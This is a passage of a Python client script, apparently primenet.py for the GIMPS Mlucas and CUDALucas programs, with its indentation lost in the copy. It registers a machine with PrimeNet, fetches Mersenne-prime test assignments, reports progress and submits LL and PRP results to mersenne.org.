# if options.worktype == LL
if r['w'] in set(['100', '102', '104']):
tests.append("Test="+",".join([r[i] for i in ['k', 'n', 'sf', 'p1']]))
# if options.worktype == DC
elif r['w'] in set(['101']):
tests.append("DoubleCheck="+",".join([r[i] for i in ['k', 'n', 'sf', 'p1']]))
# if PRP type testing, first time
elif r['w'] in set(['150', '152', '153']):
tests.append("PRP="+",".join([r[i] for i in ['k', 'b', 'n', 'c', 'sf', 'saved']]))
# if PRP-DC (probable-primality double-check) testing
elif r['w'] in set(['151']):
tests.append("PRP="+",".join([r[i] for i in ['k', 'b', 'n', 'c', 'sf', 'saved', 'base', 'rt']]))
return tests
except ConnectionError:
debug_print("URL open error at primenet_fetch")
return []
def get_assignment(progress):
w = readonly_list_file(workfile)
tasks = greplike(workpattern, w)
(percent, time_left) = None, None
if progress is not None and type(progress) == tuple and len(progress) == 2:
(percent, time_left) = progress # unpack update_progress output
num_cache = int(options.num_cache) + 1
if time_left is not None and time_left <= options.days_work*24*3600:
# time_left and percent increase are exclusive (don't want to do += 2)
num_cache += 1
debug_print("Time_left is {0} and smaller than limit ({1}), so num_cache is increased by one to {2}".format(
time_left, options.days_work*24*3600, num_cache))
num_to_get = num_to_fetch(tasks, num_cache)
if num_to_get < 1:
debug_print(workfile + " already has " + str(len(tasks)) +
" >= " + str(num_cache) + " entries, not getting new work")
return 0
debug_print("Fetching " + str(num_to_get) + " assignments")
new_tasks = primenet_fetch(num_to_get)
num_fetched = len(new_tasks)
if num_fetched > 0:
debug_print("Fetched {0} assignments:".format(num_fetched))
for new_task in new_tasks:
debug_print("{0}".format(new_task))
write_list_file(workfile, new_tasks, "a")
if num_fetched < num_to_get:
debug_print("Error: Failed to obtain requested number of new assignments, " +
str(num_to_get) + " requested, " + str(num_fetched) + " successfully retrieved")
return num_fetched
resultpattern = re.compile("[Pp]rogram|CUDALucas")
def mersenne_find(line, complete=True):
# Pre-v19 old-style HRF-formatted result used "Program:..."; starting w/v19 JSON-formatted result uses "program",
return resultpattern.search(line)
try:
from statistics import median_low
except ImportError:
def median_low(mylist):
sorts = sorted(mylist)
length = len(sorts)
return sorts[(length-1)//2]
def parse_stat_file(p):
statfile = 'p' + str(p) + '.stat'
if os.path.exists(statfile) is False:
print("ERROR: stat file does not exist")
return 0, None
w = readonly_list_file(statfile) # appended line by line, no lock needed
found = 0
regex = re.compile("Iter# = (.+?) .*?(\d+\.\d+) (m?sec)/iter")
list_usec_per_iter = []
# get the 5 most recent Iter line
for line in reversed(w):
res = regex.search(line)
if res:
found += 1
# keep the last iteration to compute the percent of progress
if found == 1:
iteration = int(res.group(1))
usec_per_iter = float(res.group(2))
unit = res.group(3)
if unit == "sec":
usec_per_iter *= 1000
list_usec_per_iter.append(usec_per_iter)
if found == 5:
break
if found == 0:
return 0, None # iteration is 0, but don't know the estimated speed yet
# take the media of the last grepped lines
usec_per_iter = median_low(list_usec_per_iter)
return iteration, usec_per_iter
def parse_v5_resp(r):
ans = dict()
for line in r.splitlines():
if line == "==END==":
break
option, _, value = line.partition("=")
ans[option] = value
return ans
def send_request(guid, args):
args["g"] = guid
# to mimic mprime, it is necessary to add safe='"{}:,' argument to urlencode, in
# particular to encode JSON in result submission. But safe is not supported by python2...
url_args = urlencode(args)
url_args += "&ss=19191919&sh=ABCDABCDABCDABCDABCDABCDABCDABCD"
try:
r = requests.get(primenet_v5_burl+url_args)
result = parse_v5_resp(r.text)
rc = int(result["pnErrorResult"])
if rc:
if rc in errors:
resmsg = errors[rc]
else:
resmsg = "Unknown error code"
debug_print("PrimeNet error " + str(rc) +
": " + resmsg, file=sys.stderr)
debug_print(result["pnErrorDetail"], file=sys.stderr)
else:
if result["pnErrorDetail"] != "SUCCESS":
debug_print("PrimeNet success code with additional info:")
debug_print(result["pnErrorDetail"])
except HTTPError as e:
debug_print("ERROR receiving answer to request: " +
str(primenet_v5_burl+url_args), file=sys.stderr)
debug_print(e, file=sys.stderr)
return None
except ConnectionError as e:
debug_print("ERROR connecting to server for request: " +
str(primenet_v5_burl+url_args), file=sys.stderr)
debug_print(e, file=sys.stderr)
return None
return result
def create_new_guid():
guid = hex(getrandbits(128))
if guid[:2] == '0x':
guid = guid[2:] # remove the 0x prefix
if guid[-1] == 'L':
guid = guid[:-1] # remove trailling 'L' in python2
# add missing 0 to the beginning"
guid = (32-len(guid))*"0" + guid
return guid
def register_instance(guid):
# register the instance to server, guid is the instance identifier
if options.username is None or options.hostname is None:
parser.error(
"To register the instance, --username and --hostname are required")
hardware_id = sha256(options.cpu_model.encode(
"utf-8")).hexdigest()[:32] # similar as mprime
args = primenet_v5_bargs.copy()
args["t"] = "uc" # update compute command
args["a"] = platform.system() + ('64' if platform.machine().endswith('64')
else '') + ",Mlucas,v" + str(VERSION)
if config.has_option("primenet", "sw_version"):
args["a"] = config.get("primenet", "sw_version")
args["wg"] = "" # only filled on Windows by mprime
args["hd"] = hardware_id # 32 hex char (128 bits)
args["c"] = options.cpu_model[:64] # CPU model (len between 8 and 64)
args["f"] = options.features[:64] # CPU option (like asimd, max len 64)
args["L1"] = options.L1 # L1 cache size in KBytes
args["L2"] = options.L2 # L2 cache size in KBytes
# if smaller or equal to 256,
# server refuses to gives LL assignment
args["np"] = options.np # number of cores
args["hp"] = options.hp # number of hyperthreading cores
args["m"] = options.memory # number of megabytes of physical memory
args["s"] = options.frequency # CPU frequency
args["h"] = 24 # pretend to run 24h/day
args["r"] = 0 # pretend to run at 100%
args["u"] = options.username #
args["cn"] = options.hostname[:20] # truncate to 20 char max
if guid is None:
guid = create_new_guid()
result = send_request(guid, args)
if result is None or int(result["pnErrorResult"]) != 0:
parser.error("Error while registering on mersenne.org")
# Save program options in case they are changed by the PrimeNet server.
config.set("primenet", "username", result["u"])
config.set("primenet", "name", result["un"])
config.set("primenet", "hostname", result["cn"])
merge_config_and_options(config, options)
config_write(config, guid=guid)
program_options(guid)
print("GUID {guid} correctly registered with the following features:".format(
guid=guid))
print("Username: {0}".format(options.username))
print("Computer name: {0}".format(options.hostname))
print("CPU model: {0}".format(options.cpu_model))
print("CPU features: {0}".format(options.features))
print("CPU L1 Cache size: {0} KIB".format(options.L1))
print("CPU L2 Cache size: {0} KiB".format(options.L2))
print("CPU cores: {0}".format(options.np))
print("CPU threads per core: {0}".format(options.hp))
print("CPU frequency: {0} MHz".format(options.frequency))
print("Total RAM: {0} MiB".format(options.memory))
print(u"If you want to change the value, please edit the “" +
options.localfile + u"” file")
print("You can see the result in this page:")
print("https://www.mersenne.org/editcpu/?g={guid}".format(guid=guid))
return
def config_read():
config = ConfigParser(dict_type=OrderedDict)
try:
config.read([localfile])
except ConfigParserError as e:
debug_print("ERROR reading {0} file:".format(
localfile), file=sys.stderr)
debug_print(e, file=sys.stderr)
if not config.has_section("primenet"):
# Create the section to avoid having to test for it later
config.add_section("primenet")
return config
def get_guid(config):
try:
return config.get("primenet", "guid")
except ConfigParserError:
return None
def config_write(config, guid=None):
# generate a new local.ini file
if guid is not None: # update the guid if necessary
config.set("primenet", "guid", guid)
with open(localfile, "w") as configfile:
config.write(configfile)
def merge_config_and_options(config, options):
# getattr and setattr allow access to the options.xxxx values by name
# which allow to copy all of them programmatically instead of having
# one line per attribute. Only the attr_to_copy list need to be updated
# when adding an option you want to copy from argument options to local.ini config.
attr_to_copy = ["workfile", "resultsfile", "username", "password", "worktype", "num_cache", "days_work",
"hostname", "cpu_model", "features", "frequency", "memory", "L1", "L2", "np", "hp", "gpu"]
updated = False
for attr in attr_to_copy:
# if "attr" has its default value in options, copy it from config
attr_val = getattr(options, attr)
if not hasattr(opts_no_defaults, attr) \
and config.has_option("primenet", attr):
# If no option is given and the option exists in local.ini, take it from local.ini
new_val = config.get("primenet", attr)
# config file values are always str()
# they need to be converted to the expected type from options
if attr_val is not None:
new_val = type(attr_val)(new_val)
setattr(options, attr, new_val)
elif attr_val is not None and (not config.has_option("primenet", attr)
or config.get("primenet", attr) != str(attr_val)):
# If an option is given (even default value) and it is not already
# identical in local.ini, update local.ini
debug_print(u"update “" + options.localfile +
u"” with {0}={1}".format(attr, attr_val))
config.set("primenet", attr, str(attr_val))
updated = True
global localfile
global workfile
global resultsfile
localfile = os.path.join(workdir, options.localfile)
workfile = os.path.join(workdir, options.workfile)
resultsfile = os.path.join(workdir, options.resultsfile)
return updated
Assignment = namedtuple('Assignment', "id p is_prp iteration usec_per_iter")
def update_progress():
w = readonly_list_file(workfile)
tasks = greplike(workpattern, w)
if not len(tasks):
return # don't update if no worktodo
config_updated = False
# Treat the first assignment. Only this one is used to save the usec_per_iter
# The idea is that the first assignment is having a .stat file with correct values
# Most of the time, a later assignment would not have a .stat file to obtain information,
# but if it has, it may come from an other computer if the user moved the files, and so
# it doesn't have revelant values for speed estimation.
# Using usec_per_iter from one p to another is a good estimation if both p are close enougth
# if there is big gap, it will be other or under estimated.
# Any idea for a better estimation of assignment duration when only p and type (LL or PRP) is known ?
assignment = get_progress_assignment(tasks[0])
usec_per_iter = assignment.usec_per_iter
if usec_per_iter is not None:
config.set("primenet", "usec_per_iter",
"{0:.2f}".format(usec_per_iter))
config_updated = True
elif config.has_option("primenet", "usec_per_iter"):
# If not speed available, get it from the local.ini file
usec_per_iter = float(config.get("primenet", "usec_per_iter"))
percent, time_left = compute_progress(
assignment.p, assignment.iteration, usec_per_iter)
debug_print("p:{0} is {1:.2f}% done".format(assignment.p, percent))
if time_left is None:
debug_print("Finish cannot be estimated")
else:
debug_print("Finish estimated in {0:.1f} days (used {1:.1f} msec/iter estimation)".format(
time_left/3600/24, usec_per_iter))
send_progress(assignment.id, assignment.is_prp, percent, time_left)
# Do the other assignment accumulating the time_lefts
cur_time_left = time_left
for task in tasks[1:]:
assignment = get_progress_assignment(task)
percent, time_left = compute_progress(
assignment.p, assignment.iteration, usec_per_iter)
debug_print("p:{0} is {1:.2f}% done".format(assignment.p, percent))
if time_left is None:
debug_print("Finish cannot be estimated")
else:
cur_time_left += time_left
debug_print("Finish estimated in {0:.1f} days (used {1:.1f} msec/iter estimation)".format(
cur_time_left/3600/24, usec_per_iter))
send_progress(assignment.id, assignment.is_prp,
percent, cur_time_left)
if config_updated:
config_write(config)
return percent, cur_time_left
def get_progress_assignment(task):
''' Ex: Test=197ED240A7A41EC575CB408F32DDA661,57600769,74 '''
found = workpattern.search(task)
print(task)
if not found:
debug_print("ERROR: Unable to extract valid PrimeNet assignment ID from entry in " +
workfile + ": " + str(task[0]), file=sys.stderr)
return
assignment_id = found.group(2) # e.g., "197ED240A7A41EC575CB408F32DDA661"
is_prp = found.group(1) == "PRP" # e.g., "Test"
debug_print("type = {0}, assignment_id = {1}".format(
found.group(1), assignment_id)) # e.g., "57600769", "197ED240A7A41EC575CB408F32DDA661"
found = task.split(",")
idx = 3 if is_prp else 1
if len(found) <= idx:
debug_print("Unable to extract valid exponent substring from entry in " +
workfile + ": " + str(task))
return None, None
# Extract the subfield containing the exponent, whose position depends on the assignment type:
p = int(found[idx])
if not options.gpu:
iteration, usec_per_iter = parse_stat_file(p)
else:
iteration, usec_per_iter = parse_stat_file_cuda()
return Assignment(assignment_id, p, is_prp, iteration, usec_per_iter)
def parse_stat_file_cuda():
# CUDALucas only function
# appended line by line, no lock needed
if os.path.exists(options.gpu) == False:
print("ERROR: GPU file does not exist")
return 0, None
w = readonly_list_file(options.gpu)
found = 0
iter_regex = re.compile(r'\b\d{5,}\b')
ms_per_regex = re.compile(r'\b\d+\.\d+\b')
list_msec_per_iter = []
# get the 5 most recent Iter line
for line in reversed(w):
iter_res = re.findall(iter_regex, line)
ms_res = re.findall(ms_per_regex, line)
# regex matches, but not when cudalucas is continuing
# if iter_res and ms_res and "Compatibility" not in line and "Continuing" not in line and "M(" not in line:
if iter_res and ms_res:
found += 1
# keep the last iteration to compute the percent of progress
if found == 1:
iteration = int(iter_res[1])
elif int(iter_res[1]) > iteration:
break
msec_per_iter = float(ms_res[1])
list_msec_per_iter.append(msec_per_iter)
if found == 5:
break
if found == 0:
return 0, None # iteration is 0, but don't know the estimated speed yet
# take the media of the last grepped lines
msec_per_iter = median_low(list_msec_per_iter)
return iteration, msec_per_iter
def compute_progress(p, iteration, usec_per_iter):
percent = 100*float(iteration)/float(p)
if usec_per_iter is None:
return percent, None
iteration_left = p - iteration
time_left = int(usec_per_iter * iteration_left / 1000)
return percent, time_left
def send_progress(assignment_id, is_prp, percent, time_left, retry_count=0):
guid = get_guid(config)
if guid is None:
debug_print("Cannot update, the registration is not done",
file=sys.stderr)
return
if retry_count > 5:
return
# Assignment Progress fields:
# g= the machine's GUID (32 chars, assigned by Primenet on 1st-contact from a given machine, stored in 'guid=' entry of local.ini file of rundir)
#
args = primenet_v5_bargs.copy()
args["t"] = "ap" # update compute command
# k= the assignment ID (32 chars, follows '=' in Primenet-geerated workfile entries)
args["k"] = assignment_id
# p= progress in %-done, 4-char format = xy.z
args["p"] = "{0:.1f}".format(percent)
# d= when the client is expected to check in again (in seconds ... )
args["d"] = options.timeout if options.timeout else 24*3600
# e= the ETA of completion in seconds, if unknown, just put 1 week
args["e"] = time_left if time_left is not None else 7*24*3600
# c= the worker thread of the machine ... always sets = 0 for now, elaborate later if desired
args["c"] = options.cpu
# stage= LL in this case, although an LL test may be doing TF or P-1 work first so it's possible to be something besides LL
if not is_prp:
args["stage"] = "LL"
retry = False
result = send_request(guid, args)
if result is None:
debug_print("ERROR while updating on mersenne.org", file=sys.stderr)
# Try again
retry = True
else:
rc = int(result["pnErrorResult"])
if rc == primenet_api.ERROR_OK:
debug_print("Update correctly sent to server")
else:
if rc == primenet_api.ERROR_STALE_CPU_INFO:
debug_print("STALE CPU INFO ERROR: re-send computer update")
register_instance(guid)
retry = True
elif rc == primenet_api.ERROR_UNREGISTERED_CPU:
debug_print(
"UNREGISTERED CPU ERROR: pick a new GUID and register again")
register_instance(None)
retry = True
elif rc == primenet_api.ERROR_SERVER_BUSY:
retry = True
else:
# TODO: treat more errors correctly in all send_request callers
# primenet_api.ERROR_INVALID_ASSIGNMENT_KEY
# primenet_api.ERROR_WORK_NO_LONGER_NEEDED
# drop the assignment
debug_print("ERROR while updating on mersenne.org",
file=sys.stderr)
if retry:
return send_progress(assignment_id, is_prp, percent, time_left, retry_count+1)
return
def get_cuda_ar_object(sendline):
# CUDALucas only function
# sendline example: 'M( 108928711 )C, 0x810d83b6917d846c, offset = 106008371, n = 6272K, CUDALucas v2.06, AID: 02E4F2B14BB23E2E4B95FC138FC715A8'
ar = {}
# args example: ['M( 108928711 )C', '0x810d83b6917d846c', 'offset = 106008371', 'n = 6272K', 'CUDALucas v2.06', 'AID: 02E4F2B14BB23E2E4B95FC138FC715A8']
args = ([x.strip() for x in sendline.split(",")])
ar['aid'] = args[5][5:]
ar['worktype'] = 'LL' # CUDAlucas only does LL tests
# the else does not matter in Loarer's program
ar['status'] = 'P' if int(args[1], 0) == 0 else 'R'
ar['exponent'] = re.search(r'\d{5,}', args[0]).group(0)
ar['res64'] = args[1][2:]
ar['shift-count'] = args[2].strip("offset = ")
ar['error-code'] = "00000000"
ar['fft-length'] = str(int(args[3].strip("n = ").strip("K")) * 1000)
return ar
def submit_one_line(sendline):
"""Submit one line"""
if not options.gpu: # MLucas
try:
ar = json.loads(sendline)
is_json = True
except json.decoder.JSONDecodeError:
is_json = False
else: # CUDALucas
ar = get_cuda_ar_object(sendline)
guid = get_guid(config)
if guid is not None and ar is not None and (options.gpu or is_json):
# If registered and the ar object was returned successfully, submit using the v5 API
# The result will be attributed to the registered computer
# If registered and the line is a JSON, submit using the v5 API
# The result will be attributed to the registered computer
sent = submit_one_line_v5(sendline, guid, ar)
else:
# The result will be attributed to "Manual testing"
sent = submit_one_line_manually(sendline)
return sent
def announce_prime_to_user(exponent, worktype):
for i in range(3):
print('\a')
time.sleep(.5)
if worktype == 'LL':
print("New Mersenne Prime!!!! M"+exponent+" is prime!")
else:
print("New Probable Prime!!!! "+exponent+" is a probable prime!")
def get_result_type(ar):
"""Extract result type from JSON result"""
if ar['worktype'] == 'LL':
if ar['status'] == 'P':
announce_prime_to_user(ar['exponent'], ar['worktype'])
return primenet_api.PRIMENET_AR_LL_PRIME
else:
return primenet_api.PRIMENET_AR_LL_RESULT
elif ar['worktype'].startswith('PRP'):
if ar['status'] == 'P':
announce_prime_to_user(ar['exponent'], ar['worktype'])
return primenet_api.PRIMENET_AR_PRP_PRIME
else:
return primenet_api.PRIMENET_AR_PRP_RESULT
else:
raise ValueError(
"This is a bug in primenet.py, Unsupported worktype {0}".format(ar['worktype']))
def submit_one_line_v5(sendline, guid, ar):
"""Submit one result line using V5 API, will be attributed to the computed identified by guid"""
"""Return False if the submission should be retried"""
# JSON is required because assignment_id is necessary in that case
# and it is not present in old output format.
debug_print("Submitting using V5 API\n" + sendline)
aid = ar['aid']
result_type = get_result_type(ar)
args = primenet_v5_bargs.copy()
args["t"] = "ar" # assignment result
args["k"] = ar['aid'] if 'aid' in ar else 0 # assignment id
args["m"] = sendline # message is the complete JSON string
args["r"] = result_type # result type
args["d"] = 1 # done: 0 for no closing is used for partial results
args["n"] = ar['exponent']
if result_type in (primenet_api.PRIMENET_AR_LL_RESULT, primenet_api.PRIMENET_AR_LL_PRIME):
if result_type == primenet_api.PRIMENET_AR_LL_RESULT:
args["rd"] = ar['res64']
if 'shift-count' in ar:
args['sc'] = ar['shift-count']
if 'error-code' in ar:
args["ec"] = ar['error-code']
elif result_type in (primenet_api.PRIMENET_AR_PRP_RESULT, primenet_api.PRIMENET_AR_PRP_PRIME):
args.update((("A", 1), ("b", 2), ("c", -1)))
if result_type == primenet_api.PRIMENET_AR_PRP_RESULT:
args["rd"] = ar['res64']
if 'error-code' in ar:
args["ec"] = ar['error-code']
if 'known-factors' in ar:
args['nkf'] = len(ar['known-factors'])
args["base"] = ar['worktype'][4:] # worktype == PRP-base
if 'residue-type' in ar:
args["rt"] = ar['residue-type']
if 'shift-count' in ar:
args['sc'] = ar['shift-count']
if 'errors' in ar:
args['gbz'] = 1
args['fftlen'] = ar['fft-length']
result = send_request(guid, args)
if result is None:
debug_print("ERROR while submitting result on mersenne.org: assignment_id={0}".format(
aid), file=sys.stderr)
# if this happens, the submission can be retried
# since no answer has been received from the server
return False
else:
return return_code(result, aid)
def submit_one_line_manually(sendline):
"""Submit results using manual testing, will be attributed to "Manual Testing" in mersenne.org"""
debug_print("Submitting using manual results\n" + sendline)
try:
url = primenet_baseurl + "manual_result/default.php"
r = s.post(url, data={"data": sendline})
res_str = r.text
if "Error" in res_str:
ibeg = res_str.find("Error")
iend = res_str.find("</div>", ibeg)
print("Submission failed: '{0}'".format(res_str[ibeg:iend]))
elif "Accepted" in res_str:
pass
else:
print("submit_work: Submission of results line '" + sendline +
"' failed for reasons unknown - please try manual resubmission.")
except ConnectionError:
debug_print("URL open ERROR")
return True # EWM: Append entire results_send rather than just sent to avoid resubmitting
# bad results (e.g. previously-submitted duplicates) every time the script executes.
def submit_work():
results_send = readonly_list_file(sentfile)
# Only submit completed work, i.e. the exponent must not exist in worktodo file any more
# appended line by line, no lock needed
results = readonly_list_file(resultsfile)
# EWM: Note that readonly_list_file does not need the file(s) to exist - nonexistent files simply yield 0-length rs-array entries.
# remove nonsubmittable lines from list of possibles
results = filter(mersenne_find, results)
# if a line was previously submitted, discard
results_send = [line for line in results if line not in results_send]
# Only for new results, to be appended to results_sent
sent = []
if len(results_send) == 0:
debug_print("No complete results found to send.")
return
# EWM: Switch to one-result-line-at-a-time submission to support error-message-on-submit handling:
for sendline in results_send:
# case where password is entered (not needed in v5 API since we have a key)
if options.password:
is_sent = submit_one_line_manually(sendline)
else:
is_sent = submit_one_line(sendline)
if is_sent:
sent.append(sendline)
write_list_file(sentfile, sent, "a")
#######################################################################################################
#
# Start main program here
#
#######################################################################################################
parser = optparse.OptionParser(version="%prog 1.0", description=u"""This program will automatically get assignments, report assignment results and optionally progress to PrimeNet for both the CUDALucas and Mlucas GIMPS programs. It also saves its configuration to a “local.ini” file, so it is only necessary to give most of the arguments the first time it is run.
The first time it is run, if a password is NOT provided, it will register the current CUDALucas/Mlucas instance with PrimeNet (see below).
Then, it will get assignments, report the results and progress, if registered, to PrimeNet on a “timeout” interval, or only once if timeout is 0.
"""
)
# options not saved to local.ini
parser.add_option("-d", "--debug", action="count", dest="debug",
default=False, help="Display debugging info")
parser.add_option("-w", "--workdir", dest="workdir", default=".",
help=u"Working directory with “worktodo.ini” and “results.txt” from the GIMPS program, and “local.ini” from this program, Default: %default (current directory)")
parser.add_option("-i", "--workfile", dest="workfile",
default="worktodo.ini", help=u"WorkFile filename, Default: “%default”")
parser.add_option("-r", "--resultsfile", dest="resultsfile",
default="results.txt", help=u"ResultsFile filename, Default: “%default”")
parser.add_option("-l", "--localfile", dest="localfile", default="local.ini",
help=u"Local configuration file filename, Default: “%default”")
# all other options are saved to local.ini
parser.add_option("-u", "--username", dest="username",
help="GIMPS/PrimeNet User ID. Create a GIMPS/PrimeNet account: https://www.mersenne.org/update/. If you do not want a PrimeNet account, you can use ANONYMOUS.")
parser.add_option("-p", "--password", dest="password",
help="GIMPS/PrimeNet Password. Only provide if you want to do manual testing and not report the progress (not recommend). This was the default behavior for old versions of this script.")
# -t is reserved for timeout, instead use -T for assignment-type preference:
parser.add_option("-T", "--worktype", dest="worktype", default="100", help="""Type of work, Default: %default,
100 (smallest available first-time LL),
101 (double-check LL),
102 (world-record-sized first-time LL),
104 (100M digit number to LL test - not recommended),
150 (smallest available first-time PRP),
151 (double-check PRP),
152 (world-record-sized first-time PRP),
153 (100M digit number to PRP test)
"""
)
# parser.add_option("-g", "--gpu", action="store_true", dest="gpu", default=False,
parser.add_option("-g", "--gpu", dest="gpu", help="Get assignments for a GPU (CUDALucas) instead of the CPU (Mlucas). This flag takes as an argument the CUDALucas output filename.")
parser.add_option("-c", "--cpu_num", dest="cpu", type="int", default=0,
help="CPU core or GPU number to get assignments for, Default: %default")
parser.add_option("-n", "--num_cache", dest="num_cache", type="int",
default=0, help="Number of assignments to cache, Default: %default")
parser.add_option("-L", "--days_work", dest="days_work", type="int", default=3,
help="Days of work to queue, Default: %default days. Add one to num_cache when the time left for the current assignment is less then this number of days.")
parser.add_option("-t", "--timeout", dest="timeout", type="int", default=60*60*6,
help="Seconds to wait between network updates, Default: %default seconds (6 hours). Use 0 for a single update without looping.")
parser.add_option("--unreserve_all", action="store_true", dest="unreserve_all", default=False, help="Unreserve all assignments and exit. Requires that the instance is registered with PrimeNet.")
group = optparse.OptionGroup(parser, "Registering Options: sent to PrimeNet/GIMPS when registering. The progress will automatically be sent and the program can then be monitored on the GIMPS website CPUs page (https://www.mersenne.org/cpus/), just like with Prime95/MPrime. This also allows for the program to get much smaller Category 0 and 1 exponents, if it meets the other requirements (https://www.mersenne.org/thresholds/).")
group.add_option("-H", "--hostname", dest="hostname",
default=platform.node()[:20], help="Computer name, Default: %default")
# TODO: add detection for most parameter, including automatic change of the hardware
group.add_option("--cpu_model", dest="cpu_model", default=cpu_signature,
help="Processor (CPU) model, Default: %default")
group.add_option("--features", dest="features", default="",
help="CPU features, Default: '%default'")
group.add_option("--frequency", dest="frequency", type="int",
default=1000, help="CPU frequency (MHz), Default: %default MHz")
group.add_option("-m", "--memory", dest="memory", type="int",
default=0, help="Total memory (RAM) (MiB), Default: %default MiB")
group.add_option("--L1", dest="L1", type="int", default=8,
help="L1 Cache size (KiB), Default: %default KiB")
group.add_option("--L2", dest="L2", type="int", default=512,
help="L2 Cache size (KiB), Default: %default KiB")
group.add_option("--np", dest="np", type="int", default=1,
help="Number of CPU Cores, Default: %default")
group.add_option("--hp", dest="hp", type="int", default=0,
help="Number of CPU threads per core (0 is unknown), Default: %default")
parser.add_option_group(group)
#(options, args) = parser.parse_args()
#print(options)
opts_no_defaults = optparse.Values()
__, args = parser.parse_args(values=opts_no_defaults)
options = optparse.Values(parser.get_default_values().__dict__)
options._update_careful(opts_no_defaults.__dict__)
progname = os.path.basename(sys.argv[0])
workdir = os.path.expanduser(options.workdir)
localfile = os.path.join(workdir, options.localfile)
workfile = os.path.join(workdir, options.workfile)
resultsfile = os.path.join(workdir, options.resultsfile)
# print(opts_no_defaults)
# print(options)
# A cumulative backup
sentfile = os.path.join(workdir, "results_sent.txt")
# Good refs re. Python regexp: https://www.geeksforgeeks.org/pattern-matching-python-regex/, https://www.python-course.eu/re.php
# pre-v19 only handled LL-test assignments starting with either DoubleCheck or Test, followed by =, and ending with 3 ,number pairs:
#
# workpattern = r"(DoubleCheck|Test)=.*(,[0-9]+){3}"
#
# v19 we add PRP-test support - both first-time and DC of these start with PRP=, the DCs tack on 2 more ,number pairs representing
# the PRP base to use and the PRP test-type (the latter is a bit complex to explain here). Sample of the 4 worktypes supported by v19:
#
# Test=7A30B8B6C0FC79C534A271D9561F7DCC,89459323,76,1
# DoubleCheck=92458E009609BD9E10577F83C2E9639C,50549549,73,1
# PRP=BC914675C81023F252E92CF034BEFF6C,1,2,96364649,-1,76,0
# PRP=51D650F0A3566D6C256B1679C178163E,1,2,81348457,-1,75,0,3,1
#
# and the obvious regexp pattern-modification is
#
# workpattern = r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}"
#
# Here is where we get to the kind of complication the late baseball-philosopher Yogi Berra captured via his aphorism,
# "In theory, theory and practice are the same. In practice, they're different". Namely, while the above regexp pattern
# should work on all 4 assignment patterns, since each has a string of at least 3 comma-separated nonnegative ints somewhere
# between the 32-hexchar assignment ID and end of the line, said pattern failed on the 3rd of the above 4 assignments,
# apparently because when the regexp is done via the 'greplike' below, the (,[0-9]+){3} part of the pattern gets implicitly
# tiled to the end of the input line. Assignment # 3 above happens to have a negative number among the final 3, thus the
# grep fails. This weird behavior is not reproducible running Python in console mode:
#
# >>> import re
# >>> s1 = "DoubleCheck=92458E009609BD9E10577F83C2E9639C,50549549,73,1"
# >>> s2 = "Test=7A30B8B6C0FC79C534A271D9561F7DCC,89459323,76,1"
# >>> s3 = "PRP=BC914675C81023F252E92CF034BEFF6C,1,2,96364649,-1,76,0"
# >>> s4 = "PRP=51D650F0A3566D6C256B1679C178163E,1,2,81348457,-1,75,0,3,1"
# >>> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s1)
# <_sre.SRE_Match object at 0x1004bd250>
# >>> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s2)
# <_sre.SRE_Match object at 0x1004bd250>
# >>> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s3)
# <_sre.SRE_Match object at 0x1004bd250>.
# >> print re.search(r"(DoubleCheck|Test|PRP)=.*(,[0-9]+){3}" , s4)
# <_sre.SRE_Match object at 0x1004bd250>
#
# Anyhow, based on that I modified the grep pattern to work around the weirdness, by appending .* to the pattern, thus
# changing things to "look for 3 comma-separated nonnegative ints somewhere in the assignment, followed by anything",
# also now to specifically look for a 32-hexchar assignment ID preceding such a triplet, and to allow whitespace around
# the =. The latter bit is not needed based on current server assignment format, just a personal aesthetic bias of mine:
#
workpattern = re.compile(
"(DoubleCheck|Test|PRP)\s*=\s*([0-9A-F]{32})(,[0-9]+){3}.*")
# mersenne.org limit is about 4 KB; stay on the safe side
sendlimit = 3000 # TODO: enforce this limit
# If debug is requested
# https://stackoverflow.com/questions/10588644/how-can-i-see-the-entire-http-request-thats-being-sent-by-my-python-application
if options.debug > 1:
try:
import http.client as http_client
except ImportError:
# Python 2
import httplib as http_client
http_client.HTTPConnection.debuglevel = options.debug
# You must initialize logging, otherwise you'll not see debug output.
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
# load local.ini and update options
config = config_read()
config_updated = merge_config_and_options(config, options)
# check options after merging so that if local.ini file is changed by hand,
# values are also checked
# TODO: check that input char are ascii or at least supported by the server
if not (8 <= len(options.cpu_model) <= 64):
parser.error("cpu_model must be between 8 and 64 characters")
if options.hostname is not None and len(options.hostname) > 20:
parser.error("hostname must be less than 21 characters")
if options.features is not None and len(options.features) > 64:
parser.error("features must be less than 64 characters")
# write back local.ini if necessary
if config_updated:
debug_print("write " + options.localfile)
config_write(config)
# if guid already exist, recover it, this way, one can (re)register to change
# the CPU model (changing instance name can only be done in the website)
guid = get_guid(config)
if options.username is None:
parser.error("Username must be given")
if options.unreserve_all:
unreserve_all(guid)
sys.exit(0)
program = "CUDALucas" if options.gpu else "MLucas"
while True:
# Carry on with Loarer's style of primenet
try:
if options.password:
login_data = {"user_login": options.username,
"user_password": options.password}
url = primenet_baseurl + "default.php"
r = s.post(url, data=login_data)
if options.username + "<br>logged in" not in r.text:
primenet_login = False
debug_print("ERROR: Login failed.")
else:
primenet_login = True
# use the v5 API for registration and program options
else:
if guid is None:
register_instance(guid)
if options.timeout <= 0:
break
# worktype has changed, update worktype preference in program_options()
# if config_updated:
elif config_updated:
program_options(guid)
except HTTPError as e:
debug_print("ERROR: Login failed.")
# branch 1 or branch 2 above was taken
if not options.password or (options.password and primenet_login):
submit_work()
progress = update_progress()
got = get_assignment(progress)
debug_print("Got: " + str(got))
if got > 0 and not options.password:
debug_print(
"Redo progress update to update the just obtain assignmment(s)")
time.sleep(1)
update_progress()
if options.timeout <= 0:
break
try:
time.sleep(options.timeout)
except KeyboardInterrupt:
break
sys.exit(0)
